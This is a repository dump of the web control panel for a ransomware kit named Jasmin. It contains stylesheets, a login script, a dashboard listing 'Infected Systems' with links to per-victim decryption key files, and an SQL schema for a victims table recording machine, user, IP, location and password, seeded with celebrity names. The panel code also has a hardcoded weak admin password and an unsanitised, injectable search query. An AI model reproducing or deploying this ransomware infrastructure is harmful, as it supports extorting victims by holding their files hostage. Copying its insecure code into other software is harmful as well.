| 2% { 144 | opacity: 1; 145 | color: #fff; 146 | text-shadow: 0 0 24px #8e44ad; 147 | } 148 | 6% { 149 | opacity: 0.1; 150 | color: #8e44ad; 151 | text-shadow: 0 0 8px #8e44ad; 152 | } 153 | 12% { 154 | opacity: 0.8; 155 | color: #fff; 156 | text-shadow: 0 0 8px #8e44ad; 157 | } 158 | 14% { 159 | opacity: 0.2; 160 | color: #8e44ad; 161 | text-shadow: 0 0 8px #8e44ad; 162 | } 163 | 30% { 164 | opacity: 1; 165 | color: #fff; 166 | text-shadow: 0 0 16px #8e44ad; 167 | } 168 | 36% { 169 | opacity: 0.2; 170 | color: #8e44ad; 171 | text-shadow: 0 0 24px #8e44ad; 172 | } 173 | 60% { 174 | opacity: 0.6; 175 | text-shadow: 0 0 16px #8e44ad; 176 | } 177 | 64% { 178 | opacity: 0.8; 179 | text-shadow: 0 0 18px #8e44ad; 180 | } 181 | 68% { 182 | opacity: 1; 183 | text-shadow: 0 0 24px #8e44ad; 184 | } 185 | 82% { 186 | opacity: 0.2; 187 | text-shadow: 0 0 16px #8e44ad; 188 | } 189 | 84% { 190 | opacity: 0.1; 191 | text-shadow: 0 0 8px #8e44ad; 192 | } 193 | 86% { 194 | opacity: 0.6; 195 | text-shadow: 0 0 12px #8e44ad; 196 | } 197 | } 198 | @keyframes Flicker { 199 | 0% { 200 | opacity: 0.1; 201 | color: #8e44ad; 202 | text-shadow: 0 0 16px #8e44ad; 203 | } 204 | 2% { 205 | opacity: 1; 206 | color: #fff; 207 | text-shadow: 0 0 24px #8e44ad; 208 | } 209 | 6% { 210 | opacity: 0.1; 211 | color: #8e44ad; 212 | text-shadow: 0 0 8px #8e44ad; 213 | } 214 | 12% { 215 | opacity: 0.8; 216 | color: #fff; 217 | text-shadow: 0 0 8px #8e44ad; 218 | } 219 | 14% { 220 | opacity: 0.2; 221 | color: #8e44ad; 222 | text-shadow: 0 0 8px #8e44ad; 223 | } 224 | 30% { 225 | opacity: 1; 226 | color: #fff; 227 | text-shadow: 0 0 16px #8e44ad; 228 | } 229 | 36% { 230 | opacity: 0.2; 231 | color: #8e44ad; 232 | text-shadow: 0 0 24px #8e44ad; 233 | } 234 | 60% { 235 | opacity: 0.6; 236 | text-shadow: 0 0 16px #8e44ad; 237 | } 238 | 64% { 239 | opacity: 0.8; 240 | text-shadow: 0 0 18px #8e44ad; 241 | } 242 | 68% { 243 | opacity: 1; 244 | text-shadow: 0 0 24px #8e44ad; 245 | } 246 | 82% { 247 | opacity: 0.2; 248 | text-shadow: 0 0 16px #8e44ad; 249 | } 250 | 84% { 251 | opacity: 0.1; 252 | text-shadow: 0 0 8px #8e44ad; 253 | } 254 | 86% { 255 | opacity: 0.6; 256 | text-shadow: 0 0 12px #8e44ad; 257 | } 258 | } 259 | -------------------------------------------------------------------------------- /Web Panel/assets/css/style2.css: -------------------------------------------------------------------------------- 1 | /* 2 | Side Navigation Menu V2, RWD 3 | =================== 4 | License: 5 | https://goo.gl/EaUPrt 6 | =================== 7 | Author: @PableraShow 8 | 9 | */ 10 | 11 | @charset "UTF-8"; 12 | @import url(https://fonts.googleapis.com/css?family=Open+Sans:300,400,700); 13 | 14 | body { 15 | font-family: 'Open Sans', sans-serif; 16 | font-weight: 300; 17 | line-height: .4em; 18 | color:#A7A1AE; 19 | text-align: center; 20 | background-color:#131c31; 21 | } 22 | 23 | h1 { 24 | font-size:2.8em; 25 | font-weight: 300; 26 | line-height:1em; 27 | text-align: center; 28 | color: #4DC3FA; 29 | -webkit-animation: glow 1s ease-in-out infinite alternate; 30 | -moz-animation: glow 1s ease-in-out infinite alternate; 31 | animation: glow 1s ease-in-out infinite alternate; 32 | } 33 | 34 | 35 | @font-face { 36 | font-family: neon; 37 | src: url(https://s3-us-west-2.amazonaws.com/s.cdpn.io/707108/neon.ttf); 38 | } 39 | 40 | .container1 { 41 | display: table-cell; 42 | text-align: center; 43 | vertical-align: middle; 44 | } 45 | 46 | .neon { 47 | font-family: neon; 48 | color: #FB4264; 49 | font-size: 3em; 50 | line-height: 3em; 51 | text-shadow: 0 0 3vw #F40A35; 52 | } 53 | 54 | .flux { 55 | padding-bottom: 2.3%; 56 | padding-top: 2.3%; 57 | padding-left: .2%; 58 | padding-right: .85%; 59 | font-family: neon; 60 | color: #42e1fb; 61 | font-weight: bold; 62 | font-size: .9em; 63 | line-height: .25em; 64 | text-shadow: 0 0 0.4em #2356FF; 65 | } 66 | 67 | .neon { 68 | animation: neon 1s ease infinite; 69 | -moz-animation: neon 1s ease infinite; 70 | -webkit-animation: neon 1s ease infinite; 71 | } 72 | 73 | @keyframes neon { 74 | 0%, 75 | 100% { 76 | text-shadow: 0 0 1vw #FA1C16, 0 0 3vw #FA1C16, 0 0 10vw #FA1C16, 0 0 10vw #FA1C16, 0 0 .4vw #FED128, .5vw .5vw .1vw #806914; 77 | color: #FED128; 78 | } 79 | 50% { 80 | text-shadow: 0 0 .5vw #800E0B, 0 0 1.5vw #800E0B, 0 0 5vw #800E0B, 0 0 5vw #800E0B, 0 0 .2vw #800E0B, .5vw .5vw .1vw #40340A; 81 | color: #806914; 82 | } 83 | } 84 | 85 | 86 | .flux:hover { 87 | animation: flux .2s linear infinite; 88 | -moz-animation: flux .2s linear infinite; 89 | -webkit-animation: flux .2s linear infinite; 90 | -o-animation: flux .2s linear infinite; 91 | } 92 | @keyframes flux { 93 | 0%, 94 | 100% { 95 | text-shadow: 0 0 .5vw #1041FF, 0 0 1.5vw #1041FF, 0 0 5vw #1041FF, 0 0 5vw #1041FF, 0 0 .2vw #8BFDFE, .3vw .3vw .1vw #147280; 96 | color: #28D7FE; 97 | } 98 | 50% { 99 | text-shadow: 0 0 .25vw #082180, 0 0 .75vw #082180, 0 0 2.5vw #082180, 0 0 2.5vw #082180, 0 0 .1vw #082180, .25vw .25vw .1vw #0A3940; 100 | color: #146C80; 101 | } 102 | } 103 | 104 | h2 { 105 | font-size:1em; 106 | font-weight: 300; 107 | text-align: center; 108 | display: block; 109 | line-height: -100px; 110 | color: #FB667A; 111 | padding-top: 0%; 112 | padding-bottom: -2%; 113 | } 114 | 115 | h2 a { 116 | font-weight: 4000; 117 | text-transform: uppercase; 118 | color: #FB667A; 119 | text-decoration: none; 120 | } 121 | 122 | .blue { color: #185875; } 123 | .yellow1 { color: #FFF842; 124 | font-size:.7em; 125 | font-weight: bold; 126 | padding-bottom: 4.3%; 127 | 128 | } 129 | .yellow { color: #FFF842; 130 | padding-bottom: -4em; 131 | } 132 | 133 | .container th h1 { 134 | font-weight: bold; 135 | font-size: .98em; 136 | text-align: center; 137 | color: #28d7fe; 138 | 139 | } 140 | 141 | .container td { 142 | text-align: center; 143 | font-weight: bold; 144 | font-size: .8em; 145 | -webkit-box-shadow: 0 2px 2px -2px #0E1119; 146 | -moz-box-shadow: 0 2px 2px -2px #0E1119; 147 | box-shadow: 0 2px 2px -2px #0E1119; 148 | white-space: nowrap; 149 | } 150 | 151 | .container { 152 | text-align: center; 153 | overflow: hidden; 154 | width: 85%; 155 | margin: 0 auto; 156 | display: table; 157 | padding: 0 0 8em 0; 158 | } 159 | 160 | .container td, .container th { 161 | padding-bottom: 1.9%; 162 | text-align: center; 163 | padding-top: 1.9%; 164 | padding-left: .3%; 165 | } 166 | 167 | /* Background-color of the odd rows */ 168 | .container td:nth-child(odd) { 169 | background-color: #323C50; 170 | text-align: center; 171 | } 172 | 173 | /* Background-color of the even rows */ 174 | .container td:nth-child(even) { 175 | background-color: #2C3446; 176 | text-align: center; 177 | } 178 | 179 | .container th { 180 | background-color: #1F2739; 181 | text-align: center; 182 | } 183 | 184 | .container td:first-child { 185 | font-weight: bold; 186 | font-size: .9em; 187 | color: #FB667A; 188 | 189 | 190 | 191 | } 192 | 193 | .container tr:hover { 194 | background-color: #464A52; 195 | -webkit-box-shadow: 0 6px 6px -6px #0E1119; 196 | -moz-box-shadow: 0 6px 6px -6px #0E1119; 197 | box-shadow: 0 6px 6px -6px #0E1119; 198 | } 199 | 200 | .container td:hover { 201 | background-color: #FFF842; 202 | color: #403E10; 203 | font-weight: bold; 204 | 205 | box-shadow: #7F7C21 -1px 1px, #7F7C21 -2px 2px, #7F7C21 -3px 3px, #7F7C21 -4px 4px, #7F7C21 -5px 5px, #7F7C21 -6px 6px; 206 | transform: translate3d(6px, -6px, 0); 207 | 208 | transition-delay: 0s; 209 | transition-duration: 0.4s; 210 | transition-property: all; 211 | transition-timing-function: line; 212 | } 213 | 214 | /* Style buttons */ 215 | .btn { 216 | background-color:#323C50; 217 | border: none; 218 | color:#28d7fe; 219 | padding: 12px 30px; 220 | cursor: pointer; 221 | font-size: .8em; 222 | } 223 | 224 | /* Darker background on mouse-over */ 225 | .btn:hover { 226 | background-color: #000022; 227 | } 228 | 229 | @media (max-width: 800px) { 230 | .container td:nth-child(4), 231 | .container th:nth-child(4) { display: none; } 232 | } 233 | 234 | 235 | 236 | @import url(https://fonts.googleapis.com/css?family=Open+Sans); 237 | 238 | 239 | .search { 240 | width: 100%; 241 | position: relative; 242 | display: flex; 243 | } 244 | 245 | .searchTerm { 246 | width: 100%; 247 | border: 3px solid #00B4CC; 248 | border-right: none; 249 | padding: 5px; 250 | height: 20px; 251 | border-radius: 5px 0 0 5px; 252 | outline: none; 253 | color: #9DBFAF; 254 | } 255 | 256 | .searchTerm:focus{ 257 | color: #00B4CC; 258 | } 259 | 260 | .searchButton { 261 | width: 40px; 262 | height: 36px; 263 | border: 1px solid #00B4CC; 264 | background: #00B4CC; 265 | text-align: center; 266 | color: #fff; 267 | border-radius: 0 5px 5px 0; 268 | cursor: pointer; 269 | font-size: 20px; 270 | } 271 | 272 | /*Resize the wrap to see the search bar change!*/ 273 | .wrap{ 274 | width: 20%; 275 | position: relative; 276 | left: 82%; 277 | padding-bottom: 0em; 278 | transform: translate(-50%, -50%); 279 | } 280 | body 281 | { 282 | font-family: sans-serif; 283 | } 284 | ul li 285 | { 286 | list-style-type: none; 287 | } 288 | ul 289 | { 290 | position: absolute; 291 | 292 | 293 | left:50%; 294 | transform: translate(-50%,-50%); 295 | display:flex; 296 | margin:0; 297 | padding: 0; 298 | padding-bottom: 7em; 299 | } 300 | ul li a{ 301 | position: relative; 302 | padding-bottom:2px; 303 | display: block; 304 | width: 40px; 305 | height: 32px; 306 | font-size: 20px; 307 | text-align: center; 308 | line-height: 40px; 309 | background: #353535; 310 | margin:5px; 311 | text-decoration: none; 312 | color: #565656; 313 | border-radius:4px; 314 | box-shadow: inset 0 5px 10px rgba(0, 0, 0, .1) , 0 2px 5px rgba(0, 0, 0, .5) 315 | 316 | 317 | } 318 | a.active { 319 | background-color: #fff; 320 | box-shadow: 0 0 5px rgb(255,224,27), 0 0 5px rgb(255,224,27); 321 | } 322 | a.active:hover 323 | { 324 | background-color:#565656; 325 | text-shadow:0 0 2px rgb(255,224,27), 0 0 2px rgb(255,224,27); 326 | } 327 | 328 | ul li a:hover 329 | { 330 | color:#fff; 331 | text-shadow: 0 0 12px rgb(255,224,27), 0 0 12px rgb(255,224,27); 332 | 333 | } 334 | a{ 335 | position: relative; 336 | 337 | } -------------------------------------------------------------------------------- /Web Panel/assets/js/login.js: -------------------------------------------------------------------------------- 1 | $(document).ready(function() { 2 | 3 | var state = false; 4 | 5 | //$("input:text:visible:first").focus(); 6 | 7 | $('#accesspanel').on('submit', function(e) { 8 | 9 | e.preventDefault(); 10 | 11 | document.getElementById("litheader").className = "poweron"; 12 | document.getElementById("go").className = ""; 13 | document.getElementById("go").value = "Initializing..."; 14 | 15 | $.ajax({ 16 | type: "POST", 17 | url: 'checklogin.php', 18 | data: $(this).serialize(), 19 | success: function(data) 20 | { 21 | if (data === 'success') { 22 | 23 | window.location = './assets/other/loading.php'; 24 | } 25 | else { 26 | 27 | document.getElementById("litheader").className = ""; 28 | document.getElementById("go").className = "denied"; 29 | document.getElementById("go").value = "Access Denied"; 30 | 31 | } 32 | } 33 | }); 34 | 35 | 36 | 37 | /* 38 | state = !state; 39 | 40 | if (state) { 41 | document.getElementById("litheader").className = "poweron"; 42 | document.getElementById("go").className = ""; 43 | document.getElementById("go").value = "Initializing..."; 44 | }else{ 45 | document.getElementById("litheader").className = ""; 46 | document.getElementById("go").className = "denied"; 47 | document.getElementById("go").value = "Access Denied"; 48 | } 49 | */ 50 | 51 | }); 52 | 53 | }); -------------------------------------------------------------------------------- /Web Panel/assets/other/loading.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Loading 6 | 7 | 8 | 9 | 10 |
11 |
12 | LOADING 13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Web Panel/checklogin.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web Panel/dashboard.php: -------------------------------------------------------------------------------- 1 | 2 | 9 | 10 | 11 | 12 | Jasmin Dashboard 13 | 14 | 15 | 16 | 17 | 18 | 19 |

Jasmin Ransomware

20 |

Coded with Heart ❤️ by → S i d d h a n t _ G o u r

21 |

-Infected Systems Database-

22 | 23 |
24 |
25 | 32 |
33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | $total_pages) 75 | { 76 | header("Location: ./assets/other/notfound.php"); 77 | } 78 | 79 | $query="select * from victims where (machine_name like '$%search%') OR (computer_user like '%$search%') OR (os like'%$search%') OR (ip like '%$search%') OR (location like '%$search%') OR (systemid like '%$search%') LIMIT $offset, $records_per_page ";//select query for viewing users. 80 | $run=mysqli_query($dbcon, $query);//here run the sql query. 81 | while($row=mysqli_fetch_array($run))//while look to fetch the result and store in a array $row. 82 | { 83 | $machine_name=$row[1]; 84 | $computer_user=$row[2]; 85 | $os = $row[3]; 86 | $date=$row[4]; 87 | $time=$row[5]; 88 | $ip=$row[6]; 89 | $location=$row[7]; 90 | $systemid=$row[8]; 91 | 92 | //Logic to Retrive Correect Password File. 93 | $newtime = date("H-i-s", strtotime($time)); 94 | $password_folder_name = $machine_name. '_' .$computer_user; 95 | $password_file_name = $newtime. '_' .$systemid; 96 | $password_file_extension = $password_file_name. "." ."flora"; 97 | $file ='passwords/'; 98 | $file .= $password_folder_name. '/' .$password_file_extension; 99 | 100 | ?> 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | $total_pages) 131 | { 132 | header("Location: ./assets/other/notfound.php"); 133 | } 134 | 135 | $query = "select * from victims ORDER BY `id` DESC LIMIT $offset, $records_per_page ";//select query for viewing users. 136 | $run = mysqli_query($dbcon,$query); 137 | while($row = mysqli_fetch_array($run)){ 138 | //here goes the data 139 | $machine_name=$row[1]; 140 | $computer_user=$row[2]; 141 | $os = $row[3]; 142 | $date=$row[4]; 143 | $time=$row[5]; 144 | $ip=$row[6]; 145 | $location=$row[7]; 146 | $systemid=$row[8]; 147 | 148 | //Logic to Retrive Correect Password File. 149 | $newtime = date("H-i-s", strtotime($time)); 150 | $password_folder_name = $machine_name. '_' .$computer_user; 151 | $password_file_name = $newtime. '_' .$systemid; 152 | $password_file_extension = $password_file_name. "." ."flora"; 153 | $file ='passwords/'; 154 | $file .= $password_folder_name. '/' .$password_file_extension; 155 | 156 | ?> 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 174 |

Machine Name

Username

IP Address

Date

Time

Location

os

Decryption key

175 | 176 | 262 | " ; 267 | echo " "; 268 | } 269 | else 270 | { 271 | echo " " ; 272 | echo " "; 273 | } 274 | ?> 275 | 276 |

© codesiddhant

277 | 278 | 279 | 280 | -------------------------------------------------------------------------------- /Web Panel/database/db_conection.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /Web Panel/database/jasmin_db.sql: -------------------------------------------------------------------------------- 1 | -- phpMyAdmin SQL Dump 2 | -- version 4.9.2 3 | -- https://www.phpmyadmin.net/ 4 | -- 5 | -- Host: 127.0.0.1 6 | -- Generation Time: Jan 02, 2020 at 11:01 PM 7 | -- Server version: 10.4.10-MariaDB 8 | -- PHP Version: 7.3.12 9 | 10 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; 11 | SET AUTOCOMMIT = 0; 12 | START TRANSACTION; 13 | SET time_zone = "+00:00"; 14 | 15 | 16 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 17 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; 18 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; 19 | /*!40101 SET NAMES utf8mb4 */; 20 | 21 | -- 22 | -- Database: `jasmin_db` 23 | -- 24 | 25 | -- -------------------------------------------------------- 26 | 27 | -- 28 | -- Table structure for table `master` 29 | -- 30 | 31 | CREATE TABLE `master` ( 32 | `id` int(11) NOT NULL, 33 | `admin` varchar(1000) NOT NULL, 34 | `creds` varchar(1000) NOT NULL 35 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 36 | 37 | -- 38 | -- Dumping data for table `master` 39 | -- 40 | 41 | INSERT INTO `master` (`id`, `admin`, `creds`) VALUES 42 | (1, 'siddhant', '123456'); 43 | 44 | -- -------------------------------------------------------- 45 | 46 | -- 47 | -- Table structure for table `victims` 48 | -- 49 | 50 | CREATE TABLE `victims` ( 51 | `id` int(11) NOT NULL, 52 | `machine_name` varchar(1000) NOT NULL, 53 | `computer_user` varchar(1000) NOT NULL, 54 | `os` varchar(1000) NOT NULL, 55 | `date` varchar(1000) NOT NULL, 56 | `time` time NOT NULL, 57 | `ip` varchar(1000) NOT NULL, 58 | `location` text NOT NULL, 59 | `systemid` varchar(1000) NOT NULL, 60 | `password` varchar(1000) NOT NULL 61 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 62 | 63 | -- 64 | -- Dumping data for table `victims` 65 | -- 66 | 67 | INSERT INTO `victims` (`id`, `machine_name`, `computer_user`, `os`, `date`, `time`, `ip`, `location`, `systemid`, `password`) VALUES 68 | (304, 'DESKTOP-37Q74QH', 'cyberstair', 'Windows 10', '03-01-2020, Friday', '03:24:33', '47.247.223.177', 'Raipur', '96457DF79A87C7C0008A7BE7', 'xAS4NinH/HQKNJwsNtTWN5yD'), 69 | (306, 'Bollywood', 'Salman Khan', 'Windows 10', '03-01-2020, Friday', '03:26:10', '47.247.223.177', 'Mumbai', 'df545f454f5d4f5d4af5', 'M9M99EvNpZVOWpy9Q8sZLHEP'), 70 | (307, 'Indian Cricket', 'Virat Kohli', 'Mac Os 11', '03-01-2020, Friday', '03:27:03', '47.247.223.177', 'Delhi', 'SDGFs4F4S4FD4F4545fs', '3tIHrYJqqTSBpw4lgMMck1GD'), 71 | (308, 'White House', 'Donald Trump', 'Windows 10', '03-01-2020, Friday', '03:28:32', '47.247.223.177', 'Washington Dc', 'fgighefesdgvrd5g45rd4h', 'RJtCd9QqiCfBaSU0zQf84dvd'), 72 | (309, 'FiFa', 'Leone Messi', 'Mac Os 11', '03-01-2020, Friday', '03:29:59', '47.247.223.177', 'Argentina', 'gfhsfkdjkfvdd454s5g4', 'JDNAaz6e3oyM8cN+AGFdMl/5'); 73 | 74 | -- 75 | -- Indexes for dumped tables 76 | -- 77 | 78 | -- 79 | -- Indexes for table `master` 80 | -- 81 | ALTER TABLE `master` 82 | ADD PRIMARY KEY (`id`); 83 | 84 | -- 85 | -- Indexes for table `victims` 86 | -- 87 | ALTER TABLE `victims` 88 | ADD PRIMARY KEY (`id`); 89 | 90 | -- 91 | -- AUTO_INCREMENT for dumped tables 92 | -- 93 | 94 | -- 95 | -- AUTO_INCREMENT for table `master` 96 | -- 97 | ALTER TABLE `master` 98 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2; 99 | 100 | -- 101 | -- AUTO_INCREMENT for table `victims` 102 | -- 103 | ALTER TABLE `victims` 104 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=310; 105 | COMMIT; 106 | 107 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 108 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; 109 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; 110 | -------------------------------------------------------------------------------- /Web Panel/database/readme.txt: -------------------------------------------------------------------------------- 1 | database deatils- 2 | 3 | database name = test 4 | database user = jasminadmin 5 | database password = 123456 6 | 7 | -------------------------------------------------------------------------------- /Web Panel/download_file.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web Panel/handshake.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Web Panel/index.php: -------------------------------------------------------------------------------- 1 | 8 | 9 | 10 | 11 | 12 | 13 | Jasmin Dashboard 14 | 15 | 16 | 17 |
18 |
19 |
20 | loading..... 21 | Jasmin Dashboard 22 |
23 |
24 |
25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /Web Panel/kit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Web Panel/kit.zip -------------------------------------------------------------------------------- /Web Panel/login.php: -------------------------------------------------------------------------------- 1 | 8 | 9 | 10 | 11 | 12 | Login Below 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 |
23 |
24 | 25 |
26 |

LOGIN

27 |
28 |

29 | 30 |

31 |

32 | 33 |

34 |
35 |
36 | 37 | 38 |
39 | 40 |
41 | 42 |
43 |

44 | 45 |

46 |
47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /Web Panel/logout.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | Pagination 4 | 5 | 6 | 7 | 8 | 9 | 10 | 39 | 49 | 50 | --------------------------------------------------------------------------------